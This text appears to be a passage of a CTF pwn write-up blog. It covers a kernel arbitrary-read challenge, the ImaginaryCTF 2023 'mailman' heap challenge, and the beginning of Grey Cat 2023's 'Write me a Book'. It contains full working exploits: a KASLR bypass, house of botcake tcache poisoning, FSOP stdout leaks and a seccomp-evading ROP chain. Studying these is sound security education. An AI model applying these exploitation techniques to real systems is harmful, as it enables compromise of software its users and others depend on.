  unsigned __int64 v8; // [rsp+108h] [rbp-18h]
  __int64 v9; // [rsp+118h] [rbp-8h]

  _fentry__(filp, cmd, arg);
  v9 = v3;
  v8 = __readgsqword(0x28u);
  if ( (_DWORD)cmd == 0x1337 )
  {
    copy_from_user(&req, arg, 0x108LL);
    result = (int)copy_to_user(arg.buf, req.ptr, 0x100LL);
  }
  else
  {
    result = -1LL;
  }
  if ( v8 != __readgsqword(0x28u) )
    JUMPOUT(0xC3LL);
  return result;
}

The structure used to exchange with the kernel driver looks like this:

typedef struct request_s {
    uint64_t kptr;
    uint8_t buf[256];
} request_t;

Which means we have a very powerful arbitrary read primitive.

Exploitation

To compile the exploit and pack the fs I used this quick and dirty command if you mind:

musl-gcc src/exploit.c -static -o initramfs/exploit && cd initramfs && find . -print0 | cpio --null -ov --format=newc > ../initramfs.cpio && cd .. && ./run.sh initramfs.cpio

First let's take a look at the protection layout by using the kchecksec developped by @bata24 in his awesome fork of gef.

gef> kchecksec
------------------------------------------------------------------ Kernel information ------------------------------------------------------------------
Kernel version                          : 5.19.0
Kernel cmdline                          : console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet
Kernel base (heuristic)                 : 0xffffffff9b600000
Kernel base (_stext from kallsyms)      : 0xffffffff9b600000
------------------------------------------------------------------- Register settings -------------------------------------------------------------------
Write Protection (CR0 bit 16)           : Enabled
PAE (CR4 bit 5)                         : Enabled (NX is supported)
SMEP (CR4 bit 20)                       : Enabled
SMAP (CR4 bit 21)                       : Enabled
CET (CR4 bit 23)                        : Disabled
-------------------------------------------------------------------- Memory settings --------------------------------------------------------------------
CONFIG_RANDOMIZE_BASE (KASLR)           : Enabled
CONFIG_FG_KASLR (FGKASLR)               : Unsupported
CONFIG_PAGE_TABLE_ISOLATION (KPTI)      : Enabled
RWX kernel page                         : Not found
----------------------------------------------------------------------- Allocator -----------------------------------------------------------------------
Allocator                               : SLUB
CONFIG_SLAB_FREELIST_HARDENED           : Enabled (offsetof(kmem_cache, random): 0xb8)
-------------------------------------------------------------------- Security Module --------------------------------------------------------------------
SELinux                                 : Disabled (selinux_init: Found, selinux_state: Not initialized)
SMACK                                   : Disabled (smack_init: Found, smackfs: Not mounted)
AppArmor                                : Enabled (apparmor_init: Found, apparmor_initialized: 1, apparmor_enabled: 1)
TOMOYO                                  : Disabled (tomoyo_init: Found, tomoyo_enabled: 0)
Yama (ptrace_scope)                     : Enabled (yama_init: Found, kernel.yama.ptrace_scope: 1)
Integrity                               : Supported (integrity_iintcache_init: Found)
LoadPin                                 : Unsupported (loadpin_init: Not found)
SafeSetID                               : Supported (safesetid_security_init: Found)
Lockdown                                : Supported (lockdown_lsm_init: Found)
BPF                                     : Supported (bpf_lsm_init: Found)
Landlock                                : Supported (landlock_init: Found)
Linux Kernel Runtime Guard (LKRG)       : Disabled (Not loaded)
----------------------------------------------------------------- Dangerous system call -----------------------------------------------------------------
vm.unprivileged_userfaultfd             : Disabled (vm.unprivileged_userfaultfd: 0)
kernel.unprivileged_bpf_disabled        : Enabled (kernel.unprivileged_bpf_disabled: 2)
kernel.kexec_load_disabled              : Disabled (kernel.kexec_load_disabled: 0)
------------------------------------------------------------------------- Other -------------------------------------------------------------------------
CONFIG_KALLSYMS_ALL                     : Enabled
CONFIG_RANDSTRUCT                       : Disabled
CONFIG_STATIC_USERMODEHELPER            : Disabled (modprobe_path: RW-)
CONFIG_STACKPROTECTOR                   : Enabled (offsetof(task_struct, stack_canary): 0x9c8)
KADR (kallsyms)                         : Enabled (kernel.kptr_restrict: 2, kernel.perf_event_paranoid: 2)
KADR (dmesg)                            : Enabled (kernel.dmesg_restrict: 1)
vm.mmap_min_addr                        : 0x10000

What matters for us is mainly the KASLR that is on. Then, the first step will be to defeat it.

Defeat kASLR

To defeat kASLR we could use the trick already use a while ago by the hxp team in one of their kernel shellcoding challenge. The idea would be to read through the cpu_entry_area fix-mapped area, that is not rebased by the kASLR, a pointer toward the kernel .text. Then giving us a powerful infoleak thats allows us to find for example the address of the initramfs. I just had to search a few minutes the right pointer in gdb and that's it, at 0xfffffe0000002f50 is stored a pointer toward KERNEL_BASE + 0x1000b59! Which gives:

    req.kptr = 0xfffffe0000002f50; 
    if (ioctl(fd, 0x1337, &req)) {
        return -1;
    }

    kernel_text =  ((uint64_t* )req.buf)[0] - 0x1000b59;
    printf("[!] kernel .text found at %lx\n", kernel_text);

initramfs for the win

The initramfs is mapped right after the kernel, from kbase + 0x2c3b000, which means given we leaked the .text, we can deduce by it the address of the initramfs and then we can simply look for the icft pattern while reading the whole initramfs. Which gives:

    printf("[!] initramfs at %lx\n", kernel_text + 0x2c3b000);

    while (1) {
        req.kptr = kernel_text + 0x2c00000 + offt;
        if (ioctl(fd, 0x1337, &req)) {
            return -1;
        }

        for (size_t i = 0; i < 0x100; i += 4) {
            if (!memcmp(req.buf+i, "ictf", 4)) {
                printf("flag: %s\n", (char* )(req.buf+i));
            }
        }

        offt += 0x100;
    }

PROFIT

Finally here we are:

mount: mounting host0 on /tmp/mount failed: No such device
cp: can't stat '/dev/sda': No such file or directory

Boot time: 2.78

---------------------------------------------------------------
                     _                            
                    | |                           
       __      _____| | ___ ___  _ __ ___   ___   
       \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \  
        \ V  V /  __/ | (_| (_) | | | | | |  __/_ 
         \_/\_/ \___|_|\___\___/|_| |_| |_|\___(_)
                                            
  Take the opportunity. Look through the window. Get the flag.
---------------------------------------------------------------
/ # ./exploit 
[!] kernel .text found at ffffffff8de00000
[!] initramfs at ffffffff90a3b000
flag: ictf{th3_real_flag_was_the_f4ke_st4ck_canaries_we_met_al0ng_the_way}

Annexes

Final exploit:

#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>

typedef struct request_s {
    uint64_t kptr;
    uint8_t buf[256];
} request_t;

int main()
{
    request_t req = {0};
    uint64_t kernel_text = 0;
    uint64_t offt = 0;

    int fd = open("/dev/window", O_RDWR);
    if (fd < 0) {
        return -1;
    }

    req.kptr = 0xfffffe0000002f50; 
    if (ioctl(fd, 0x1337, &req)) {
        return -1;
    }

    kernel_text =  ((uint64_t* )req.buf)[0] - 0x1000b59;
    printf("[!] kernel .text found at %lx\n", kernel_text);
    printf("[!] initramfs at %lx\n", kernel_text + 0x2c3b000);

    while (1) {
        req.kptr = kernel_text + 0x2c00000 + offt;
        if (ioctl(fd, 0x1337, &req)) {
            return -1;
        }

        for (size_t i = 0; i < 0x100; i += 4) {
            if (!memcmp(req.buf+i, "ictf", 4)) {
                printf("flag: %s\n", (char* )(req.buf+i));
            }
        }

        offt += 0x100;
    }

    close(fd);
    return 0;
}

[ImaginaryCTF 2023 - pwn] mailman

Mon, 24 Jul 2023 00:00:00 GMT

mailman

mailman (423 pts) - 31 solves by Eth007

Description

I'm sure that my post office is 100% secure! It uses some of the latest software, unlike some of the other post offices out there... Flag is in ./flag.txt.

Attachments https://imaginaryctf.org/r/PIxtO#vuln https://imaginaryctf.org/r/c9Mk8#libc.so.6

nc mailman.chal.imaginaryctf.org 1337

mailman is a heap challenge I did for the ImaginaryCTF 2023 event. It was a basic heap challenge involving tcache poisoning, safe-linking and seccomp bypass. You can find the related files there.

TL;DR

Trivial heap and libc leak
tcache poisoning to hiijack stdout
FSOP on stdout to leak environ
tcache poisoning on the fgets's stackframe
ROPchain that takes care of the seccomp
PROFIT

Code review

First let's take at the version of the libc and at the protections inabled onto the binary.

$ checksec --file vuln 
[*] '/home/alexis/Documents/pwn/ImaginaryCTF/mailman/vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ checksec --file libc.so.6 
[*] '/home/alexis/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ ./libc.so.6 
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
$ seccomp-tools dump ./vuln
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0010
 0008: 0x15 0x01 0x00 0x00000005  if (A == fstat) goto 0010
 0009: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

Full prot for the binary and classic partial RELRO for the already up-to-date libc. The binary loads a seccomp that allows only the read, write, open, fstat and exit system calls.

By reading the code in IDA the main looks like this:

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // rax
  int v4; // [rsp+Ch] [rbp-24h] BYREF
  size_t size; // [rsp+10h] [rbp-20h] BYREF
  __int64 v6; // [rsp+18h] [rbp-18h]
  __int64 v7; // [rsp+20h] [rbp-10h]
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  v6 = seccomp_init(0LL, argv, envp);
  seccomp_rule_add(v6, 2147418112LL, 2LL, 0LL);
  seccomp_rule_add(v6, 2147418112LL, 0LL, 0LL);
  seccomp_rule_add(v6, 2147418112LL, 1LL, 0LL);
  seccomp_rule_add(v6, 2147418112LL, 5LL, 0LL);
  seccomp_rule_add(v6, 2147418112LL, 60LL, 0LL);
  seccomp_load(v6);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  puts("Welcome to the post office.");
  puts("Enter your choice below:");
  puts("1. Write a letter");
  puts("2. Send a letter");
  puts("3. Read a letter");
  while ( 1 )
  {
    while ( 1 )
    {
      printf("> ");
      __isoc99_scanf("%d%*c", &v4);
      if ( v4 != 3 )
        break;
      v7 = inidx();
      puts(*((const char **)&mem + v7));
    }
    if ( v4 > 3 )
      break;
    if ( v4 == 1 )
    {
      v7 = inidx();
      printf("letter size: ");
      __isoc99_scanf("%lu%*c", &size);
      v3 = malloc(size);
      *((_QWORD *)&mem + v7) = v3;
      printf("content: ");
      fgets(*((char **)&mem + v7), size, stdin);
    }
    else
    {
      if ( v4 != 2 )
        break;
      v7 = inidx();
      free(*((void **)&mem + v7));
    }
  }
  puts("Invalid choice!");
  _exit(0);
}

The program allows to create a chunk of any size, filling it with user-supplied input with fgets. We can print its content or free it. The bug lies in the free handler that doesn't check if a chunk has already been free'd.

Exploitation

Before bypassing the seccomp we need to get code execution, to do so I will use the very classic exploitation flow: FSOP stdout to leak environ => ROPchain. I could have used an angry FSOP to directly get code execution by hijjacking the vtable used by the wide operations in stdout, given actually it is not checked against a specific address range as it is the case for the _vtable. To get code execution, we need to get the heap and libc base addresses.

Heap and libc leak

To get a heap leak we can simply do defeat safe-linking:

# leak

free(0)
view(0)

heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
pwn.log.info(f"heap @ {hex(heap)}")

To get an arbitrary read / write I used the house of botcake technique. I already talked about it more deeply there. During this house I put a chunk in the unsortedbin, leaking the libc:

add(0, 0x100, b"YY")

add(7, 0x100, b"YY") # prev
add(8, 0x100, b"YY") # a

# fill tcache
for i in range(7):
    free(i)

for _ in range(20):
    add(9, 0x10, b"/bin/sh\0") # barrier

free(8) # free(a) => unsortedbin
free(7) # free(prev) => merged with a

# leak libc
view(8)

libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
pwn.log.success(f"libc: {hex(libc.address)}")

House of botcake for the win

The house of botcake is very easy to understand, it is useful when you can trigger some double free bug. It is basically:

Allocate 7 0x100 sized chunks to then fill the tcache (7 entries).
Allocate two more 0x100 sized chunks (prev and a in the example).
Allocate a small “barrier” 0x10 sized chunk.
Fill the tcache by freeing the first 7 chunks.
free(a), thus a falls into the unsortedbin.
free(prev), thus prev is consolidated with a to create a large 0x221 sized chunk that is remains in the unsortedbin.
Request one more 0x100 sized chunk to let a single entry available in the tcache.
free(a) again, given a is part of the large 0x221 sized chunk it leads to an UAF. Thus a falls into the tcache.
That’s finished, to get a write what where we just need to request a 0x130 sized chunk. Thus we can hiijack the next fp of a that is currently referenced by the tcache by the location we wanna write to. And next time two 0x100 sized chunks are requested, the second one will be the target location.

Which gives:

for i in range(7):
    add(i, 0x100, b"")

# leak

free(0)
view(0)

heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
pwn.log.info(f"heap @ {hex(heap)}")

add(0, 0x100, b"YY")

add(7, 0x100, b"YY") # prev
add(8, 0x100, b"YY") # a

# fill tcache
for i in range(7):
    free(i)

for _ in range(20):
    add(9, 0x10, b"/bin/sh\0") # barrier

free(8) # free(a) => unsortedbin
free(7) # free(prev) => merged with a

# leak libc
view(8)

libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
pwn.log.success(f"libc: {hex(libc.address)}")

stdout = libc.address + 0x21a780
environ = libc.address + 0x2a72d0 + 8
strr = libc.address + 0x1bd460

pwn.log.success(f"environ: {hex(environ)}")
pwn.log.success(f"stdout: {hex(stdout)}")

add(0, 0x100, b"YY") # pop a chunk from the tcache to let an entry left to a 
free(8) # free(a) => tcache

# unsortedbin => oob on a => tcache poisoning
add(1, 0x130, b"T"*0x108 + pwn.p64(0x111) + pwn.p64(((stdout) ^ ((heap + 0x2b90) >> 12))))
add(2, 0x100, b"TT")

# tcache => stdout

Then, at the next 0x100 request stdout will be returned! Something important to notice if you're a beginner in heap exploitation is how the safe-linking is handled, you have to xor the target location with ((chunk_location) >> 12)). Sometimes the result is not properly aligned leading to a crash, to avoid this you can add or sub 0x8 to your target location.

FSOP on stdout

To leak the address of the stack we can use a FSOP on stdout. To understand how a such attack does work I advice you to read my this write-up. The goal is to read the stack address stored at libc.sym.environ within the libc. Which gives:

# tcache => stdout
add(3, 0x100, pwn.flat(0xfbad1800, # _flags
                        libc.sym.environ, # _IO_read_ptr
                        libc.sym.environ, # _IO_read_end
                        libc.sym.environ, # _IO_read_base
                        libc.sym.environ, # _IO_write_base
                        libc.sym.environ + 0x8, # _IO_write_ptr
                        libc.sym.environ + 0x8, # _IO_write_end
                        libc.sym.environ + 0x8, # _IO_buf_base
                        libc.sym.environ + 8 # _IO_buf_end
                        )
    )

stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x160 # stackframe of fgets
pwn.log.info(f"stack: {hex(stack)}")

PROFIT

Now we leaked everything we just need to reuse the arbitrary write provided thanks to the house of botcake, given we already have overlapping chunks, to get another arbitrary write we just need to put the large chunk in a large tcache and the overlapped chunk in the 0x100 tcache, then we just have to corrupt victim->fp to the saved rip of the fgets stackframe :). It gives:

rop = pwn.ROP(libc, base=stack)

# ROPchain
rop(rax=pwn.constants.SYS_open, rdi=stack + 0xde + 2 - 0x18, rsi=pwn.constants.O_RDONLY) # open
rop.call(rop.find_gadget(["syscall", "ret"]))
rop(rax=pwn.constants.SYS_read, rdi=3, rsi=(stack & ~0xfff), rdx=0x300) # file descriptor bf ...
rop.call(rop.find_gadget(["syscall", "ret"]))

rop(rax=pwn.constants.SYS_write, rdi=1, rsi=(stack & ~0xfff), rdx=0x50) # write
rop.call(rop.find_gadget(["syscall", "ret"]))
rop.raw("./flag.txt\x00")

# victim => tcache
free(8) 

# prev => tcache 0x140
free(7) 

# tcache poisoning
add(5, 0x130, b"T"*0x100 + pwn.p64(0) + pwn.p64(0x111) + pwn.p64(((stack - 0x28) ^ ((heap + 0x2b90) >> 12))))
add(2, 0x100, b"TT") # dumb

print(rop.dump())
add(3, 0x100, pwn.p64(0x1337)*5 + rop.chain())

io.interactive()

Which gives:

$ python3 exploit.py REMOTE HOST=mailman.chal.imaginaryctf.org PORT=1337
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/ld-linux-x86-64.so.2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to mailman.chal.imaginaryctf.org on port 1337: Done
[*] heap @ 0x5611bbf93000
[+] libc: 0x7f6b49fec000
[+] environ: 0x7f6b4a2932d8
[+] stdout: 0x7f6b4a206780
[*] stack: 0x7fff28533ba8
[*] Loaded 218 cached gadgets for '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
[*] Switching to interactive mode
ictf{i_guess_the_post_office_couldnt_hide_the_heapnote_underneath_912b123f}

Annexes

Final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "vuln"
LIBC = "/home/alexis/Documents/pwn/ImaginaryCTF/mailman/libc.so.6"
LD = "/home/alexis/Documents/pwn/ImaginaryCTF/mailman/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
pwn.context.timeout = 3
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8  = pwn.p8
u8  = pwn.u8

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
b* main
'''.format(**locals())

def exp():
    io = start()

    def add(idx, size, data, noLine=False):
        io.sendlineafter(b"> ", b"1")
        io.sendlineafter(b"idx: ", str(idx).encode())
        io.sendlineafter(b"size: ", str(size).encode())
        
        if not noLine:
            io.sendlineafter(b"content: ", data)
        else:
            io.sendafter(b"content: ", data)

    def view(idx):
        io.sendlineafter(b"> ", b"3")
        io.sendlineafter(b"idx: ", str(idx).encode())

    def free(idx):
        io.sendlineafter(b"> ", b"2")
        io.sendlineafter(b"idx: ", str(idx).encode())

    for i in range(7):
        add(i, 0x100, b"")

    # leak

    free(0)
    view(0)

    heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
    pwn.log.info(f"heap @ {hex(heap)}")

    add(0, 0x100, b"YY")

    add(7, 0x100, b"YY") # prev
    add(8, 0x100, b"YY") # a

    # fill tcache
    for i in range(7):
        free(i)

    for _ in range(20):
        add(9, 0x10, b"/bin/sh\0") # barrier

    free(8) # free(a) => unsortedbin
    free(7) # free(prev) => merged with a

    # leak libc
    view(8)

    libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
    pwn.log.success(f"libc: {hex(libc.address)}")

    stdout = libc.address + 0x21a780
    environ = libc.address + 0x2a72d0 + 8
    strr = libc.address + 0x1bd460

    pwn.log.success(f"environ: {hex(environ)}")
    pwn.log.success(f"stdout: {hex(stdout)}")

    add(0, 0x100, b"YY") # pop a chunk from the tcache to let an entry left to a 
    free(8) # free(a) => tcache

    # unsortedbin => oob on a => tcache poisoning
    add(
        1, 0x130, pwn.flat(
                            b"T"*0x108 + pwn.p64(0x111),
                           (stdout) ^ ((heap + 0x2b90) >> 12)
                           )
        )
    add(2, 0x100, b"TT")

    # tcache => stdout
    add(3, 0x100, pwn.flat(0xfbad1800, # _flags
                           libc.sym.environ, # _IO_read_ptr
                           libc.sym.environ, # _IO_read_end
                           libc.sym.environ, # _IO_read_base
                           libc.sym.environ, # _IO_write_base
                           libc.sym.environ + 0x8, # _IO_write_ptr
                           libc.sym.environ + 0x8, # _IO_write_end
                           libc.sym.environ + 0x8, # _IO_buf_base
                           libc.sym.environ + 8 # _IO_buf_end
                           )
        )

    stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x160 # stackframe of fgets
    pwn.log.info(f"stack: {hex(stack)}")

    rop = pwn.ROP(libc, base=stack)

    # ROPchain
    rop(rax=pwn.constants.SYS_open, rdi=stack + 0xde + 2 - 0x18, rsi=pwn.constants.O_RDONLY) # open
    rop.call(rop.find_gadget(["syscall", "ret"]))
    rop(rax=pwn.constants.SYS_read, rdi=3, rsi=(stack & ~0xfff), rdx=0x300) # file descriptor bf ...
    rop.call(rop.find_gadget(["syscall", "ret"]))

    rop(rax=pwn.constants.SYS_write, rdi=1, rsi=(stack & ~0xfff), rdx=0x50) # write
    rop.call(rop.find_gadget(["syscall", "ret"]))
    rop.raw("./flag.txt\x00")

    # victim => tcache
    free(8) 
    
    # prev => tcache 0x140
    free(7) 

    # tcache poisoning
    add(5, 0x130, b"T"*0x100 + pwn.p64(0) + pwn.p64(0x111) + pwn.p64(((stack - 0x28) ^ ((heap + 0x2b90) >> 12))))
    add(2, 0x100, b"TT") # dumb

    print(rop.dump())
    add(3, 0x100, pwn.p64(0x1337)*5 + rop.chain())

    io.interactive()

if __name__ == "__main__":
    exp()

[Grey Cat CTF Quals 2023 - pwn] Write me a Book

Sun, 21 May 2023 00:00:00 GMT

Write me a book

Write me a Book 349

Give back to the library! Share your thoughts and experiences!

The flag can be found in /flag

Elma

nc 34.124.157.94 12346

Write me a book is a heap challenge I did during the Grey Cat The Flag 2023 Qualifiers. You can find the tasks and the exploit here.

TL;DR

To manage to read the flag we have to:

create overlapping chunks due to an oob write vulnerability in rewrite_books
tcache poisoning thanks to the overlapping chunks
Overwrite the first entry of @books to then be able to rewrite 4 entries of @books by setting a large size.
With the read / write primitives of @books we leak &stdout@glibc and environ, this way getting a libc and stack leak.
This way we can simply ROP over a given stackframe.

General overview

Let's take a look at the protections and the version of the libc:

$ ./libc.so.6 
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
$ checksec --file ./libc.so.6 
[*] '/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ret2school/ctf/2023/greyctf/pwn/writemeabook/dist/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

So a very recent one with standards protections. Then let's take a look at the binary:

$ checksec --file chall
[*] '/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ret2school/ctf/2023/greyctf/pwn/writemeabook/dist/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fd000)
    RUNPATH:  b'/home/nasm/Documents/pwn/greycat/writemeabook/dist'
$ seccomp-tools dump ./chall
Welcome to the library of hopes and dreams!

We heard about your journey...
and we want you to share about your experiences!

What would you like your author signature to be?
> aa

Great! We would like you to write no more than 10 books :)
Please feel at home.
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0010
 0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
 0009: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

The binary isn't PIE based and does have a seccomp that allows only read, write, open and exit. Which will make the exploitation harder (but not that much).

Code review

The main looks like this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  puts("Welcome to the library of hopes and dreams!");
  puts("\nWe heard about your journey...");
  puts("and we want you to share about your experiences!");
  puts("\nWhat would you like your author signature to be?");
  printf("> ");
  LODWORD(author_signature) = ' yb';
  __isoc99_scanf("%12s", (char *)&author_signature + 3);
  puts("\nGreat! We would like you to write no more than 10 books :)");
  puts("Please feel at home.");
  secure_library();
  write_books();
  return puts("Goodbye!");
}

We have to give a signature (12 bytes max) sorted in author_signatures, then the program is allocating a lot of chunks in secure_library. Finally it calls write_books which contains the main logic:

unsigned __int64 write_books()
{
  int choice; // [rsp+0h] [rbp-10h] BYREF
  int fav_num; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  while ( 1 )
  {
    while ( 1 )
    {
      print_menu();
      __isoc99_scanf("%d", &choice);
      getchar();
      if ( choice != 1337 )
        break;
      if ( !secret_msg )
      {
        printf("What is your favourite number? ");
        __isoc99_scanf("%d", &fav_num);
        if ( fav_num > 0 && fav_num <= 10 && slot[2 * fav_num - 2] )
          printf("You found a secret message: %p\n", slot[2 * fav_num - 2]);
        secret_msg = 1;
      }
LABEL_19:
      puts("Invalid choice.");
    }
    if ( choice > 1337 )
      goto LABEL_19;
    if ( choice == 4 )
      return v3 - __readfsqword(0x28u);
    if ( choice > 4 )
      goto LABEL_19;
    switch ( choice )
    {
      case 3:
        throw_book();
        break;
      case 1:
        write_book();
        break;
      case 2:
        rewrite_book();
        break;
      default:
        goto LABEL_19;
    }
  }
}

There are basically three handlers:

1337, we can leak only one time the address of a given allocated chunk.
4 returns.
3 free a chunk.
1 add a book.
2 edit a book.

Let's take a quick look at each handler, first the free handler:

unsigned __int64 throw_book()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("\nAt which index of the shelf would you like to throw your book?");
  printf("Index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 > 0 && v1 <= 10 && slot[2 * v1 - 2] )
  {
    free(slot[2 * --v1]);
    slot[2 * v1] = 0LL;
    puts("Your book has been thrown!\n");
  }
  else
  {
    puts("Invaid slot!");
  }
  return v2 - __readfsqword(0x28u);
}

It only checks is the entry exists and if the index is in the right range. if it does it frees the entry and zeroes it.

Then, the add handler:

unsigned __int64 write_book()
{
  int idx2; // ebx
  _QWORD *v1; // rcx
  __int64 v2; // rdx
  int idx; // [rsp+4h] [rbp-4Ch] BYREF
  size_t size; // [rsp+8h] [rbp-48h]
  char buf[32]; // [rsp+10h] [rbp-40h] BYREF
  char v7; // [rsp+30h] [rbp-20h]
  unsigned __int64 v8; // [rsp+38h] [rbp-18h]

  v8 = __readfsqword(0x28u);
  puts("\nAt which index of the shelf would you like to insert your book?");
  printf("Index: ");
  __isoc99_scanf("%d", &idx);
  getchar();
  if ( idx <= 0 || idx > 10 || slot[2 * idx - 2] )
  {
    puts("Invaid slot!");
  }
  else
  {
    --idx;
    memset(buf, 0, sizeof(buf));
    v7 = 0;
    puts("Write me a book no more than 32 characters long!");
    size = read(0, buf, 0x20uLL) + 0x10;
    idx2 = idx;
    slot[2 * idx2] = malloc(size);
    memcpy(slot[2 * idx], buf, size - 0x10);
    v1 = (char *)slot[2 * idx] + size - 0x10;
    v2 = qword_4040D8;
    *v1 = *(_QWORD *)author_signature;
    v1[1] = v2;
    books[idx].size = size;
    puts("Your book has been published!\n");
  }
  return v8 - __readfsqword(0x28u);
}

We can allocate a chunk between 0x10 and 0x20 + 0x10 bytes and after we wrote in it the signature initially choose at the begin of the execution is put right after the end of the input.

Finally comes the handler where lies the vuln, the edit handler:

unsigned __int64 rewrite_book()
{
  _QWORD *v0; // rcx
